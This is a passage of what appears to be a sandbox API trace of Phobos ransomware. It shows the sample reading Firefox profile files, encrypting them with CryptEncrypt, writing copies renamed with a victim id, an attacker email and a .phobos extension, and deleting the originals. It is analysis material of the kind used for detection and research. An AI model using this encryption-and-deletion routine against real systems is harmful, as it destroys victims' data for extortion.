0x154 [0194.957] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=16) returned 1 [0194.957] CloseHandle (hObject=0x154) returned 1 [0194.957] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset")) returned 0x2020 [0194.957] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.957] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.957] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0194.957] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0194.957] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.958] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0194.958] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0194.958] ReadFile (in: hFile=0x154, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x10, lpOverlapped=0x0) returned 1 [0194.959] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x20, dwBufLen=0x20 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x20) returned 1 [0194.959] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x20, lpOverlapped=0x0) returned 1 [0194.960] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32de8) returned 1 [0194.960] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0194.960] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0194.960] CryptDestroyKey (hKey=0xa32de8) returned 1 [0194.960] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0194.960] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.960] CloseHandle (hObject=0x154) returned 1 [0194.960] CloseHandle (hObject=0x14c) returned 1 [0194.960] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset")) returned 1 [0194.962] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0194.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.962] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=232) returned 1 [0194.962] CloseHandle (hObject=0x14c) returned 1 [0194.963] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore")) returned 0x2020 [0194.963] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.963] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.963] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0194.963] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0194.963] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.964] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0194.964] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0194.964] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xe8, lpOverlapped=0x0) returned 1 [0194.965] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xf0, dwBufLen=0xf0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xf0) returned 1 [0194.965] WriteFile (in: hFile=0x154, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf0, lpOverlapped=0x0) returned 1 [0194.966] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32de8) returned 1 [0194.966] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0194.966] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0194.966] CryptDestroyKey (hKey=0xa32de8) returned 1 [0194.966] WriteFile (in: hFile=0x154, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0194.973] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.973] CloseHandle (hObject=0x14c) returned 1 [0194.973] CloseHandle (hObject=0x154) returned 1 [0194.973] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore")) returned 1 [0194.974] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0194.974] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.975] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=44) returned 1 [0194.975] CloseHandle (hObject=0x154) returned 1 [0194.975] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache")) returned 0x2020 [0194.975] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.975] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0194.975] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0194.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.976] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0194.976] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0194.976] ReadFile (in: hFile=0x154, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x2c, lpOverlapped=0x0) returned 1 [0194.977] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30, dwBufLen=0x30 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30) returned 1 [0194.977] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x30, lpOverlapped=0x0) returned 1 [0194.978] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32de8) returned 1 [0194.978] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0194.978] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0194.978] CryptDestroyKey (hKey=0xa32de8) returned 1 [0194.978] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0194.978] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.978] CloseHandle (hObject=0x154) returned 1 [0194.978] CloseHandle (hObject=0x14c) returned 1 [0194.978] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache")) returned 1 [0194.979] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0194.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.980] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=16) returned 1 [0194.980] CloseHandle (hObject=0x14c) returned 1 [0194.980] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset")) returned 0x2020 [0194.980] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.980] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0194.980] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0194.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.981] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0194.981] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0194.981] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x10, lpOverlapped=0x0) returned 1 [0194.982] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x20, dwBufLen=0x20 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x20) returned 1 [0194.982] WriteFile (in: hFile=0x154, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x20, lpOverlapped=0x0) returned 1 [0194.982] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32de8) returned 1 [0194.982] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0194.983] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0194.983] CryptDestroyKey (hKey=0xa32de8) returned 1 [0194.983] WriteFile (in: hFile=0x154, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0194.983] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.983] CloseHandle (hObject=0x14c) returned 1 [0194.983] CloseHandle (hObject=0x154) returned 1 [0194.983] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset")) returned 1 [0194.984] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0194.984] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.984] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=232) returned 1 [0194.984] CloseHandle (hObject=0x154) returned 1 [0194.985] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore")) returned 0x2020 [0194.985] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.985] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0194.985] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0194.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0194.986] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0194.986] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0194.986] ReadFile (in: hFile=0x154, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xe8, lpOverlapped=0x0) returned 1 [0194.987] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xf0, dwBufLen=0xf0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xf0) returned 1 [0194.987] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf0, lpOverlapped=0x0) returned 1 [0194.990] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32de8) returned 1 [0194.990] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0194.990] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, 